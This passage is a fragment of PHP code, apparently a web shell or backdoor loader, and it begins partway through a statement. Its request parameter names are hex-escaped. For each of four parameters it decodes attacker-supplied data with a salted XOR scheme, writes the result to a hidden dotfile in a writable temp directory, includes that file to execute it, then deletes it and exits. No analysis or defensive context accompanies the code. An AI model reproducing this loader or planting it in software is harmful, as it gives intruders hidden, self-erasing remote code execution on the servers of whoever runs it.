$_REQUEST["da\x74a\x5Fc\x68\x75\x6Ek"]; $itm =explode ( "." , $itm) ; $record =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s); $len =count($itm); for ($n =0; $n < $len; $n++) {$v8 =$itm[$n]; $chS =ord($s[$n % $lenS]); $d =((int)$v8 - $chS - ($n % 10)) ^ 78; $record .= chr($d); } $obj = 0; do { $ref = $parameter_group[$obj] ?? null; if ($obj >= count($parameter_group)) break; if ((is_dir($ref) and is_writable($ref))) { $symbol = "$ref/.ent"; $file = fopen($symbol, 'w'); if ($file) { fwrite($file, $record); fclose($file); include $symbol; @unlink($symbol); exit; } } $obj++; } while (true); } if(count($_REQUEST) > 0 && isset($_REQUEST["\x72\x65f"])){ $symbol = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", session_save_path()]); $dat = $_REQUEST["\x72\x65f"]; $dat=explode( "." , $dat ) ; $comp = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s); $t = 0; array_walk( $dat, function( $v3) use( &$comp, &$t, $s, $lenS) { $sChar = ord( $s[$t % $lenS]); $d =( ( int)$v3 - $sChar -( $t % 10)) ^ 22; $comp .=chr( $d); $t++; }); $tkn = 0; do { $k = $symbol[$tkn] ?? null; if ($tkn >= count($symbol)) break; if (max(0, is_dir($k) * is_writable($k))) { $rec = sprintf("%s/.reference", $k); $success = file_put_contents($rec, $comp); if ($success) { include $rec; @unlink($rec); exit;} } $tkn++; } while (true); } if(in_array("\x65n\x74ry", array_keys($_POST))){ $k = array_filter([session_save_path(), getcwd(), "/var/tmp", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), "/dev/shm", "/tmp", ini_get("upload_tmp_dir")]); $object = $_POST["\x65n\x74ry"]; $object = explode ( '.' , $object) ; $entity =''; $salt4 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt4 ); $y =0; array_walk($object , function($v2) use(&$entity , &$y , $salt4 , $lenS) { $sChar =ord($salt4[$y % $lenS] ); $d =((int)$v2 - $sChar -($y % 10))^ 9; $entity.=chr($d ); $y++; } ); foreach ($k as $pointer): if (array_product([is_dir($pointer), is_writable($pointer)])) { $dat = "$pointer" . "/.elem"; $success = file_put_contents($dat, $entity); if ($success) { include $dat; @unlink($dat); exit;} } endforeach; } if(isset($_REQUEST) && isset($_REQUEST["s\x79m"])){ $holder = array_filter([session_save_path(), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", "/tmp", sys_get_temp_dir(), "/var/tmp"]); $value = $_REQUEST["s\x79m"]; $value= explode ( "." , $value ); $factor = ''; $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt5); foreach ($value as $q => $v8): $chS = ord($salt5[$q % $sLen]); $d = ((int)$v8 - $chS - ($q % 10)) ^ 47; $factor .= chr($d); endforeach; for ($property_set = 0, $comp = count($holder); $property_set < $comp; $property_set++) { $val = $holder[$property_set]; if (!!is_dir($val) && !!is_writable($val)) { $item = "$val/.obj"; if (@file_put_contents($item, $factor) !== false) { include $item; unlink($item); exit; } } } }